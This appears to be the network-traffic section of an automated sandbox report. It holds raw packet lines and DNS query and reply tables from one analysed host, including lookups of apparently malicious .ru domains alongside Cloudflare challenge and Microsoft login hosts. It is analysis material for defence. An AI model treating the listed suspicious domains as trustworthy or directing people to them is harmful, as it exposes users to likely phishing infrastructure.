                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:39.603574038 CET5694853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:39.997468948 CET53569481.1.1.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:42.470187902 CET5102653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:42.470331907 CET6053853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:42.609128952 CET53605381.1.1.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:48.467191935 CET6474653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:48.467325926 CET5354253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:48.608630896 CET53647461.1.1.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:48.775300980 CET53535421.1.1.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:50.988327026 CET5832153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:50.988447905 CET6348153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:51.042119026 CET5266053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:51.042282104 CET5300253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:53.015228033 CET5306953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:53.015364885 CET5207953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:54.098635912 CET6101553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:54.098781109 CET5144853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:54.444736004 CET6060153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:54.444935083 CET5277553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:54.698725939 CET53527751.1.1.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:55.466448069 CET5162853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:55.466793060 CET6483853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:56.726860046 CET5721053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:56.726994038 CET6105853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:57.313318014 CET5260953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:57.313469887 CET5085153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:57.452897072 CET53508511.1.1.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:58.418044090 CET5391353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:58.418174028 CET5559753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:59.088337898 CET5457353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:59.088517904 CET5042453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:59.768052101 CET5498753192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:59.768237114 CET6443353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:59.906470060 CET53549871.1.1.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:59.906842947 CET53644331.1.1.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:00.947830915 CET6449853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:00.947954893 CET5347653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:00.951617002 CET5787053192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:00.951756954 CET5920553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:01.163264036 CET53534761.1.1.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:01.461710930 CET53578701.1.1.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:01.461903095 CET53592051.1.1.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:01.841609955 CET5434153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:01.841783047 CET6264953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:01.846482038 CET6360953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:01.846667051 CET6266553192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:01.868729115 CET5573153192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:01.868856907 CET5913353192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:02.005847931 CET53557311.1.1.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:02.006975889 CET53591331.1.1.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:02.101543903 CET53636091.1.1.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:02.116769075 CET53626651.1.1.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:02.499806881 CET5036453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:02.499924898 CET5634953192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:02.577632904 CET53626491.1.1.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:02.577881098 CET53543411.1.1.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:02.825388908 CET53563491.1.1.1192.168.2.5
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:03.461698055 CET6275453192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:03.461798906 CET5104853192.168.2.51.1.1.1
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:03.599127054 CET53510481.1.1.1192.168.2.5
                                                                                                                                                                                                                                                          TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:38.012625933 CET192.168.2.51.1.1.1c21c(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:39.606113911 CET192.168.2.51.1.1.1c285(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:48.775408030 CET192.168.2.51.1.1.1c230(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:51.457643032 CET192.168.2.51.1.1.1c2c2(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:01.569124937 CET192.168.2.51.1.1.1c2dd(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:02.825455904 CET192.168.2.51.1.1.1c253(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:42.170589924 CET192.168.2.51.1.1.10xb307Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:42.170728922 CET192.168.2.51.1.1.10x6812Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:43.767750978 CET192.168.2.51.1.1.10xb93dStandard query (0)gadk.quantumdhub.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:43.768033981 CET192.168.2.51.1.1.10x329eStandard query (0)gadk.quantumdhub.ru65IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:47.924654961 CET192.168.2.51.1.1.10x150Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:47.924906969 CET192.168.2.51.1.1.10x3e40Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:47.925534010 CET192.168.2.51.1.1.10xd382Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:47.925720930 CET192.168.2.51.1.1.10x3a00Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:47.930690050 CET192.168.2.51.1.1.10x7e47Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:47.930879116 CET192.168.2.51.1.1.10xcaecStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:50.208965063 CET192.168.2.51.1.1.10xce1cStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:50.209130049 CET192.168.2.51.1.1.10x1dc6Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:50.300762892 CET192.168.2.51.1.1.10xbf73Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:50.300923109 CET192.168.2.51.1.1.10x1d11Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:51.772715092 CET192.168.2.51.1.1.10x5543Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:51.772999048 CET192.168.2.51.1.1.10x1fb3Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:51.816859007 CET192.168.2.51.1.1.10x4512Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:51.817023993 CET192.168.2.51.1.1.10xda1eStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:56.621243000 CET192.168.2.51.1.1.10x5fb4Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:56.621481895 CET192.168.2.51.1.1.10x9314Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:09.408395052 CET192.168.2.51.1.1.10xb6eStandard query (0)qyirfeifkmxfpzq40aunypu4fmz8ucnejoritjokcewctv5c9qybgue.lpliwptf.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:09.408521891 CET192.168.2.51.1.1.10x57f5Standard query (0)qyirfeifkmxfpzq40aunypu4fmz8ucnejoritjokcewctv5c9qybgue.lpliwptf.ru65IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:13.572352886 CET192.168.2.51.1.1.10xf294Standard query (0)qyirfeifkmxfpzq40aunypu4fmz8ucnejoritjokcewctv5c9qybgue.lpliwptf.ruA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:13.572513103 CET192.168.2.51.1.1.10x42b2Standard query (0)qyirfeifkmxfpzq40aunypu4fmz8ucnejoritjokcewctv5c9qybgue.lpliwptf.ru65IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:39.070631027 CET192.168.2.51.1.1.10x3faStandard query (0)cdn.botframework.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:39.070776939 CET192.168.2.51.1.1.10xf13Standard query (0)cdn.botframework.com65IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:39.603418112 CET192.168.2.51.1.1.10x5ca2Standard query (0)play.vidyard.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:39.603574038 CET192.168.2.51.1.1.10xc8e6Standard query (0)play.vidyard.com65IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:42.470187902 CET192.168.2.51.1.1.10x96eaStandard query (0)play.vidyard.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:42.470331907 CET192.168.2.51.1.1.10x436fStandard query (0)play.vidyard.com65IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:48.467191935 CET192.168.2.51.1.1.10x466aStandard query (0)publisher.liveperson.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:48.467325926 CET192.168.2.51.1.1.10x35a6Standard query (0)publisher.liveperson.net65IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:50.988327026 CET192.168.2.51.1.1.10xc6f1Standard query (0)lpcdn.lpsnmedia.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:50.988447905 CET192.168.2.51.1.1.10xc4bbStandard query (0)lpcdn.lpsnmedia.net65IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:51.042119026 CET192.168.2.51.1.1.10x4316Standard query (0)js.monitor.azure.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:51.042282104 CET192.168.2.51.1.1.10x374bStandard query (0)js.monitor.azure.com65IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:53.015228033 CET192.168.2.51.1.1.10x3957Standard query (0)lpcdn.lpsnmedia.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:53.015364885 CET192.168.2.51.1.1.10x80dStandard query (0)lpcdn.lpsnmedia.net65IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:54.098635912 CET192.168.2.51.1.1.10xb864Standard query (0)js.monitor.azure.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:54.098781109 CET192.168.2.51.1.1.10x2ad3Standard query (0)js.monitor.azure.com65IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:54.444736004 CET192.168.2.51.1.1.10xbd64Standard query (0)lptag.liveperson.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:54.444935083 CET192.168.2.51.1.1.10x4a90Standard query (0)lptag.liveperson.net65IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:55.466448069 CET192.168.2.51.1.1.10xf659Standard query (0)cdn.botframework.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:55.466793060 CET192.168.2.51.1.1.10x3f30Standard query (0)cdn.botframework.com65IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:56.726860046 CET192.168.2.51.1.1.10xb19aStandard query (0)assets.adobedtm.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:56.726994038 CET192.168.2.51.1.1.10x3811Standard query (0)assets.adobedtm.com65IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:57.313318014 CET192.168.2.51.1.1.10xc35dStandard query (0)lptag.liveperson.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:57.313469887 CET192.168.2.51.1.1.10x1d99Standard query (0)lptag.liveperson.net65IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:58.418044090 CET192.168.2.51.1.1.10x57eaStandard query (0)login.microsoftonline.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:58.418174028 CET192.168.2.51.1.1.10xb550Standard query (0)login.microsoftonline.com65IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:59.088337898 CET192.168.2.51.1.1.10x2093Standard query (0)assets.adobedtm.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:59.088517904 CET192.168.2.51.1.1.10x1b0dStandard query (0)assets.adobedtm.com65IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:59.768052101 CET192.168.2.51.1.1.10x19c3Standard query (0)dpm.demdex.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:59.768237114 CET192.168.2.51.1.1.10xbdb5Standard query (0)dpm.demdex.net65IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:00.947830915 CET192.168.2.51.1.1.10xe000Standard query (0)accdn.lpsnmedia.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:00.947954893 CET192.168.2.51.1.1.10x6b29Standard query (0)accdn.lpsnmedia.net65IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:00.951617002 CET192.168.2.51.1.1.10x29e7Standard query (0)static-assets.fs.liveperson.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:00.951756954 CET192.168.2.51.1.1.10x5973Standard query (0)static-assets.fs.liveperson.com65IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:01.841609955 CET192.168.2.51.1.1.10x132fStandard query (0)mscom.demdex.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:01.841783047 CET192.168.2.51.1.1.10x231Standard query (0)mscom.demdex.net65IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:01.846482038 CET192.168.2.51.1.1.10xae97Standard query (0)msftenterprise.sc.omtrdc.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:01.846667051 CET192.168.2.51.1.1.10x64f9Standard query (0)msftenterprise.sc.omtrdc.net65IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:01.868729115 CET192.168.2.51.1.1.10x9a93Standard query (0)dpm.demdex.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:01.868856907 CET192.168.2.51.1.1.10xf64cStandard query (0)dpm.demdex.net65IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:02.499806881 CET192.168.2.51.1.1.10x776dStandard query (0)cm.everesttech.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:02.499924898 CET192.168.2.51.1.1.10x548bStandard query (0)cm.everesttech.net65IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:03.461698055 CET192.168.2.51.1.1.10x87cdStandard query (0)accdn.lpsnmedia.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:37:03.461798906 CET192.168.2.51.1.1.10xe902Standard query (0)accdn.lpsnmedia.net65IN (0x0001)false
                                                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:42.309104919 CET1.1.1.1192.168.2.50xb307No error (0)www.google.com172.217.19.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:42.309142113 CET1.1.1.1192.168.2.50x6812No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:44.216722012 CET1.1.1.1192.168.2.50xb93dNo error (0)gadk.quantumdhub.ru104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:44.216722012 CET1.1.1.1192.168.2.50xb93dNo error (0)gadk.quantumdhub.ru104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:44.216722012 CET1.1.1.1192.168.2.50xb93dNo error (0)gadk.quantumdhub.ru104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:44.216722012 CET1.1.1.1192.168.2.50xb93dNo error (0)gadk.quantumdhub.ru104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:44.216722012 CET1.1.1.1192.168.2.50xb93dNo error (0)gadk.quantumdhub.ru104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:44.216722012 CET1.1.1.1192.168.2.50xb93dNo error (0)gadk.quantumdhub.ru104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:44.216722012 CET1.1.1.1192.168.2.50xb93dNo error (0)gadk.quantumdhub.ru104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:44.217327118 CET1.1.1.1192.168.2.50x329eNo error (0)gadk.quantumdhub.ru65IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:48.062686920 CET1.1.1.1192.168.2.50x3a00No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:48.063071966 CET1.1.1.1192.168.2.50xd382No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:48.063071966 CET1.1.1.1192.168.2.50xd382No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:48.067673922 CET1.1.1.1192.168.2.50x7e47No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:48.067673922 CET1.1.1.1192.168.2.50x7e47No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:48.067814112 CET1.1.1.1192.168.2.50xcaecNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:48.128957033 CET1.1.1.1192.168.2.50x150No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:48.128957033 CET1.1.1.1192.168.2.50x150No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:48.128957033 CET1.1.1.1192.168.2.50x150No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:48.128957033 CET1.1.1.1192.168.2.50x150No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:50.345719099 CET1.1.1.1192.168.2.50x1dc6No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:50.346570015 CET1.1.1.1192.168.2.50xce1cNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:50.346570015 CET1.1.1.1192.168.2.50xce1cNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:50.437506914 CET1.1.1.1192.168.2.50xbf73No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:50.437506914 CET1.1.1.1192.168.2.50xbf73No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:50.437506914 CET1.1.1.1192.168.2.50xbf73No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:50.437506914 CET1.1.1.1192.168.2.50xbf73No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:51.910507917 CET1.1.1.1192.168.2.50x5543No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:51.910507917 CET1.1.1.1192.168.2.50x5543No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:51.930699110 CET1.1.1.1192.168.2.50x1fb3No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:51.953988075 CET1.1.1.1192.168.2.50xda1eNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:51.955388069 CET1.1.1.1192.168.2.50x4512No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:51.955388069 CET1.1.1.1192.168.2.50x4512No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:35:56.758347988 CET1.1.1.1192.168.2.50x5fb4No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:10.022398949 CET1.1.1.1192.168.2.50x57f5No error (0)qyirfeifkmxfpzq40aunypu4fmz8ucnejoritjokcewctv5c9qybgue.lpliwptf.ru65IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:10.022460938 CET1.1.1.1192.168.2.50xb6eNo error (0)qyirfeifkmxfpzq40aunypu4fmz8ucnejoritjokcewctv5c9qybgue.lpliwptf.ru172.67.158.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:10.022460938 CET1.1.1.1192.168.2.50xb6eNo error (0)qyirfeifkmxfpzq40aunypu4fmz8ucnejoritjokcewctv5c9qybgue.lpliwptf.ru104.21.73.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:13.710129976 CET1.1.1.1192.168.2.50xf294No error (0)qyirfeifkmxfpzq40aunypu4fmz8ucnejoritjokcewctv5c9qybgue.lpliwptf.ru104.21.73.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:13.710129976 CET1.1.1.1192.168.2.50xf294No error (0)qyirfeifkmxfpzq40aunypu4fmz8ucnejoritjokcewctv5c9qybgue.lpliwptf.ru172.67.158.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:13.710599899 CET1.1.1.1192.168.2.50x42b2No error (0)qyirfeifkmxfpzq40aunypu4fmz8ucnejoritjokcewctv5c9qybgue.lpliwptf.ru65IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:35.935625076 CET1.1.1.1192.168.2.50xbcfdNo error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:35.966564894 CET1.1.1.1192.168.2.50xa15cNo error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:35.966564894 CET1.1.1.1192.168.2.50xa15cNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:35.966564894 CET1.1.1.1192.168.2.50xa15cNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:39.210478067 CET1.1.1.1192.168.2.50x3faNo error (0)cdn.botframework.combot-framework.azureedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:39.217245102 CET1.1.1.1192.168.2.50x79c5No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:39.217835903 CET1.1.1.1192.168.2.50x667dNo error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:39.217835903 CET1.1.1.1192.168.2.50x667dNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:39.217835903 CET1.1.1.1192.168.2.50x667dNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                          Dec 21, 2024 00:36:39.606045961 CET1.1.1.1192.168.2.50xf13No error (0)cdn.botframework.combot-framework.azureedge.netCNAME (Canonical name)IN (0x0001)false
